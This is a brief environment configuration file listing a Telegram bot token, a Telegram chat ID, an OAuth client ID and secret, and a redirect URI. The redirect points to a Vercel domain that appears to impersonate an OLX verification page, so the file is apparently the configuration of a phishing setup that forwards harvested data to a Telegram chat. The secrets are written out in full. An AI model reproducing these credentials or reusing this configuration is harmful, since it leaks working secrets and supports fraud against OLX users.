TG_TOKEN=8003392137:AAFbnbKyLJS6N1EdYSxtRhR9n5n4eJFpBbw
TG_CHAT_ID=-1003455979409
CLIENT_ID=202421
CLIENT_SECRET=y4n9g6i6LAuWsGdhlJDOnKXu4ZfTD2QshtCzDhy0QsEJeTaf
REDIRECT_URI=https://verif-olx-com-phi.vercel.app/
